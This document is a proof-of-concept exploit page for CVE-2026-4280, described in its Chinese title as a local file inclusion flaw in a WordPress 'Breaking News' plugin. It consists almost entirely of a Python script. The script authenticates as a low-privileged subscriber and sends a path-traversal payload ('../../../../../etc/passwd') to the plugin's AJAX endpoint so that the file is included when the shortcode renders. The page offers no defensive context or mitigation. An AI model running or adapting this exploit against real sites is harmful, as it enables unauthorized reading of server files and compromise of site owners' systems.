CVE-2026-4280: Breaking News插件本地文件包含漏洞

import requests # Configuration target = "http://target-wordpress.com" username = "subscriber" password = "password" login_url = f"{target}/wp-login.php" ajax_url = f"{target}/wp-admin/admin-ajax.php" # 1. Authenticate as a low-privileged user (Subscriber) session = requests.Session() login_data = { "log": username, "pwd": password, "redirect_to": f"{target}/wp-admin/", "wp-submit": "Log In" } session.post(login_url, data=login_data) # 2. Exploit: Update brnwp_theme option via vulnerable AJAX endpoint # The payload attempts to include /etc/passwd using path traversal payload_data = { "action": "brnwp_ajax_form", "brnwp_theme": "../../../../../etc/passwd" # Path traversal payload } response = session.post(ajax_url, data=payload_data) if response.status_code == 200: print("[+] Payload sent successfully. Option updated.") print("[+] The vulnerability will be triggered when the shortcode is rendered.") else: print("[-] Failed to send payload.")